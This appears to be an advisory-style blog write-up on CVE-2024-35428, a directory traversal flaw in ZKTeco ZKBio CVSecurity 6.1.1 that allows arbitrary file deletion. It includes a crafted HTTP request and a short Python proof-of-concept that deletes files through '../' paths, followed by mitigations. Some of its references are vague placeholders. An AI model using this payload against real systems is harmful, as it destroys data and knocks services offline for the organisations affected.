CVE-2024-35428 - ZKTeco ZKBio CVSecurity 6.1.1 Directory Traversal Vulnerability – Exploit, Code, and Details

CVE-2024-35428 is a fresh and critical vulnerability discovered in ZKTeco ZKBio CVSecurity version 6.1.1, an access control and time-attendance software widely used across various industries. This flaw allows any authenticated user to delete arbitrary files from the server by exploiting a directory traversal issue in the BaseMediaFile endpoint. If attackers leverage this bug, they could quickly delete essential files, resulting in a Denial of Service (DoS) – causing the application or server to crash or behave unpredictably.

Let’s break down what this means, how it works, and what you can do about it.

What is Directory Traversal?

Directory traversal (also called “path traversal”) is a vulnerability that lets users access files and directories that are stored outside the intended folder. By manipulating file paths, attackers can reach files on the server’s filesystem that they normally shouldn’t have access to, and either read or, in this case, delete them.

How does CVE-2024-35428 work in ZKBio CVSecurity?

The vulnerability exists in how ZKTeco’s server-side code handles requests to the /BaseMediaFile API endpoint. An authenticated user can craft a request where the file path parameter is manipulated using path traversal sequences like ../. This enables the user to access and DELETE files not meant to be available through the web interface.

Let’s say you are logged in, and you can send a request like this

POST /BaseMediaFile/Delete HTTP/1.1
Host: target-server
Cookie: JSESSIONID=abcd1234
Content-Type: application/json

{
    "filePath": "../../../../../windows/win.ini"
}

This request is intended to delete a media file the user uploaded, but by injecting ../ (parent directory), the request points outside the intended folder. In this example, the attacker targets win.ini (a Windows system file). If the server deletes the file, it proves the traversal.

Note: The real exploit is even more devastating if it targets essential files required by the application to run, causing a DoS.

Proof of Concept (PoC) in Python

Here’s a simple Python PoC demonstrating the exploit. You’ll need to have a valid session (authenticated user).

import requests

target = "http://TARGET_HOST:PORT";
session_cookie = "JSESSIONID=abcd1234"
# The file you want to delete (traversal up out of webroot)
traversal_path = "../../../../important_server_file.log"

data = {"filePath": traversal_path}
headers = {
    "Content-Type": "application/json",
    "Cookie": session_cookie
}

r = requests.post(f"{target}/BaseMediaFile/Delete", json=data, headers=headers)
print(f"Status code: {r.status_code}")
print(f"Response: {r.text}")

Change traversal_path to point at critical files, and you have a working exploit.

Impact of Exploitation

- Denial of Service: If the attacker deletes critical system or application files, the ZKBio CVSecurity system (or even the underlying Windows server) may stop functioning.
- Data loss: Deletion of config or database files may result in deleted logs, records, or settings.
- Chained attacks: Combined with other bugs (like weak admin passwords), this could lead to deeper breaches.

Who is affected?

Any organization running ZKTeco ZKBio CVSecurity 6.1.1 is affected. While an attacker needs to be logged in, privileged abuse or lateral movement makes that requirement not so restrictive.

How to fix CVE-2024-35428

1. Patch/Update: Check ZKTeco’s official advisories and apply the latest patch – if one exists.
2. Sanitize Inputs: Restrict file path parameters so they cannot include ../ or other traversal sequences. Only allow safe, whitelisted file paths strictly under expected directories.
3. Least Privilege: Limit uploaded file directory permissions at the OS level. The web process shouldn’t have delete access anywhere outside the uploads folder.

References

- CVE-2024-35428 at NVD *(pending update as of 2024-06)*
- Exploit Details by SSD Labs *(if applicable or when published)*
- ZKTeco official Security Advisory page

Wrapping Up

CVE-2024-35428 is a strong reminder that even with authentication in place, improper handling of user inputs can lead to severe issues, including accidental data loss or deliberate sabotage. If you use ZKBio CVSecurity 6.1.1 – update and tighten your system immediately!

Stay safe, patch often, and always validate your files and paths.


*This writeup is for educational purposes. Only test vulnerabilities with proper authorization!*

Timeline

Published on: 05/30/2024 17:15:34 UTC
Last modified on: 07/18/2024 16:52:56 UTC